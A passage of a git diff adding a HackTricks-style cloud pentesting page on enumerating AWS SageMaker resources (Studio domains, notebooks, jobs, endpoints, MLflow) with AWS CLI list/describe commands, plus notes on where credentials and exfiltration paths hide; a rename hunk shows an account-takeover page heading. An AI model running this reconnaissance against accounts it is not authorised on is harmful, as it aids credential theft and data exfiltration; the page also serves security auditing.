Managed services for data preparation and feature management. +- **Autopilot & JumpStart**: Automated ML and curated model catalogue. +- **MLflow Tracking Servers**: Managed MLflow UI/API with presigned access tokens. + +Every resource references an execution role, S3 locations, container images, and optional VPC/KMS configuration—capture all of them during enumeration. + +## Account & Global Metadata + +```bash +REGION=us-east-1 +# Portfolio status, used when provisioning Studio resources +aws sagemaker get-sagemaker-servicecatalog-portfolio-status --region $REGION + +# List execution roles used by models (extend to other resources as needed) +aws sagemaker list-models --region $REGION --query 'Models[].ExecutionRoleArn' --output text | tr ' ' ' +' | sort -u + +# Generic tag sweep across any SageMaker ARN you know +aws sagemaker list-tags --resource-arn --region $REGION +``` + +Note any cross-account trust (execution roles or S3 buckets with external principals) and baseline restrictions such as service control policies or SCPs. + +## Studio Domains, Apps & Shared Spaces + +```bash +aws sagemaker list-domains --region $REGION +aws sagemaker describe-domain --domain-id --region $REGION +aws sagemaker list-user-profiles --domain-id-equals --region $REGION +aws sagemaker describe-user-profile --domain-id --user-profile-name --region $REGION + +# Enumerate apps (JupyterServer, KernelGateway, RStudioServerPro, CodeEditor, Canvas, etc.) +aws sagemaker list-apps --domain-id-equals --region $REGION +aws sagemaker describe-app --domain-id --user-profile-name --app-type JupyterServer --app-name default --region $REGION + +# Shared collaborative spaces +aws sagemaker list-spaces --domain-id-equals --region $REGION +aws sagemaker describe-space --domain-id --space-name --region $REGION + +# Studio lifecycle configurations (shell scripts at start/stop) +aws sagemaker list-studio-lifecycle-configs --region $REGION +aws sagemaker describe-studio-lifecycle-config --studio-lifecycle-config-name --region $REGION +``` + +What to record: + +- `DomainArn`, `AppSecurityGroupIds`, `SubnetIds`, `DefaultUserSettings.ExecutionRole`. +- Mounted EFS (`HomeEfsFileSystemId`) and S3 home directories. +- Lifecycle scripts (often contain bootstrap credentials or push/pull extra code). + +> [!TIP] +> Presigned Studio URLs can bypass authentication if granted broadly. + +## Notebook Instances & Lifecycle Configs + +```bash +aws sagemaker list-notebook-instances --region $REGION +aws sagemaker describe-notebook-instance --notebook-instance-name --region $REGION +aws sagemaker list-notebook-instance-lifecycle-configs --region $REGION +aws sagemaker describe-notebook-instance-lifecycle-config --notebook-instance-lifecycle-config-name --region $REGION +``` + +Notebook metadata reveals: + +- Execution role (`RoleArn`), direct internet access vs. VPC-only mode. +- S3 locations in `DefaultCodeRepository`, `DirectInternetAccess`, `RootAccess`. +- Lifecycle scripts for credentials or persistence hooks. + +## Training, Processing, Transform & Batch Jobs + +```bash +aws sagemaker list-training-jobs --region $REGION +aws sagemaker describe-training-job --training-job-name --region $REGION + +aws sagemaker list-processing-jobs --region $REGION +aws sagemaker describe-processing-job --processing-job-name --region $REGION + +aws sagemaker list-transform-jobs --region $REGION +aws sagemaker describe-transform-job --transform-job-name --region $REGION +``` + +Scrutinise: + +- `AlgorithmSpecification.TrainingImage` / `AppSpecification.ImageUri` – which ECR images are deployed. +- `InputDataConfig` & `OutputDataConfig` – S3 buckets, prefixes, and KMS keys. +- `ResourceConfig.VolumeKmsKeyId`, `VpcConfig`, `EnableNetworkIsolation` – determine network or encryption posture. +- `HyperParameters` may leak environment secrets or connection strings. + +## Pipelines, Experiments & Trials + +```bash +aws sagemaker list-pipelines --region $REGION +aws sagemaker list-pipeline-executions --pipeline-name --region $REGION +aws sagemaker describe-pipeline --pipeline-name --region $REGION + +aws sagemaker list-experiments --region $REGION +aws sagemaker list-trials --experiment-name --region $REGION +aws sagemaker list-trial-components --trial-name --region $REGION +``` + +Pipeline definitions detail every step, associated roles, container images, and environment variables. Trial components often contain training artefact URIs, S3 logs, and metrics that hint at sensitive data flow. + +## Models, Endpoint Configurations & Deployed Endpoints + +```bash +aws sagemaker list-models --region $REGION +aws sagemaker describe-model --model-name --region $REGION + +aws sagemaker list-endpoint-configs --region $REGION +aws sagemaker describe-endpoint-config --endpoint-config-name --region $REGION + +aws sagemaker list-endpoints --region $REGION +aws sagemaker describe-endpoint --endpoint-name --region $REGION +``` + +Focus areas: + +- Model artefact S3 URIs (`PrimaryContainer.ModelDataUrl`) and inference container images. +- Endpoint data capture configuration (S3 bucket, KMS) for possible log exfil. +- Multi-model endpoints using `S3DataSource` or `ModelPackage` (check for cross-account packaging). +- Network configs and security groups attached to endpoints. + +## Feature Store, Data Wrangler & Clarify + +```bash +aws sagemaker list-feature-groups --region $REGION +aws sagemaker describe-feature-group --feature-group-name --region $REGION + +aws sagemaker list-data-wrangler-flows --region $REGION +aws sagemaker describe-data-wrangler-flow --flow-name --region $REGION + +aws sagemaker list-model-quality-job-definitions --region $REGION +aws sagemaker list-model-monitoring-schedule --region $REGION +``` + +Security takeaways: + +- Online feature stores replicate data to Kinesis; check `OnlineStoreConfig.SecurityConfig.KmsKeyId` and VPC. +- Data Wrangler flows often embed JDBC/Redshift credentials or private endpoints. +- Clarify/Model Monitor jobs export data to S3 which might be world-readable or cross-account accessible. + +## MLflow Tracking Servers, Autopilot & JumpStart + +```bash +aws sagemaker list-mlflow-tracking-servers --region $REGION +aws sagemaker describe-mlflow-tracking-server --tracking-server-name --region $REGION + +aws sagemaker list-auto-ml-jobs --region $REGION +aws sagemaker describe-auto-ml-job --auto-ml-job-name --region $REGION + +aws sagemaker list-jumpstart-models --region $REGION +aws sagemaker list-jumpstart-script-resources --region $REGION +``` + +- MLflow tracking servers store experiments and artefacts; presigned URLs can expose everything. +- Autopilot jobs spin multiple training jobs—enumerate outputs for hidden data. +- JumpStart reference architectures may deploy privileged roles into the account. + +## IAM & Networking Considerations + +- Enumerate IAM policies attached to all execution roles (Studio, notebooks, training jobs, pipelines, endpoints). +- Check network contexts: subnets, security groups, VPC endpoints. Many organisations isolate training jobs but forget to restrict outbound traffic. +- Review S3 bucket policies referenced in `ModelDataUrl`, `DataCaptureConfig`, `InputDataConfig` for external access. + +## Privilege Escalation + +{{#ref}} +../../aws-privilege-escalation/aws-sagemaker-privesc/README.md +{{#endref}} + +## Persistence + +{{#ref}} +../../aws-persistence/aws-sagemaker-persistence/README.md +{{#endref}} + +## Post-Exploitation + +{{#ref}} +../../aws-post-exploitation/aws-sagemaker-post-exploitation/README.md +{{#endref}} + +## Unauthorized Access + +{{#ref}} +../aws-sagemaker-unauthorized-access/README.md +{{#endref}} + +## References + +- [AWS SageMaker Documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/whatis.html) +- [AWS CLI SageMaker Reference](https://docs.aws.amazon.com/cli/latest/reference/sagemaker/index.html) +- [SageMaker Studio Architecture](https://docs.aws.amazon.com/sagemaker/latest/dg/gs-studio.html) +- [SageMaker Security Best Practices](https://docs.aws.amazon.com/sagemaker/latest/dg/security.html) + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-unauthorized-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md similarity index 97% rename from src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-unauthorized-access.md rename to src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md index 083977650..ddada7d23 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-sagemaker-unauthorized-access.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md @@ -1,6 +1,6 @@ # AWS - SageMaker Unauthorized Access -{{#include ../../../banners/hacktricks-training.md}} +{{#include ../../../../banners/hacktricks-training.md}} ## SageMaker Studio - Account Takeover via CreatePresignedDomainUrl (Impersonate Any UserProfile) @@ -114,4 +114,4 @@ Notes: ### Impact - Direct access to the managed MLflow UI for the targeted Tracking Server, enabling viewing and modification of experiments/runs and retrieval or upload of artifacts stored in the server’s configured S3 artifact store, within the permissions enforced by the server configuration. -{{#include ../../../banners/hacktricks-training.md}} +{{#include ../../../../banners/hacktricks-training.md}}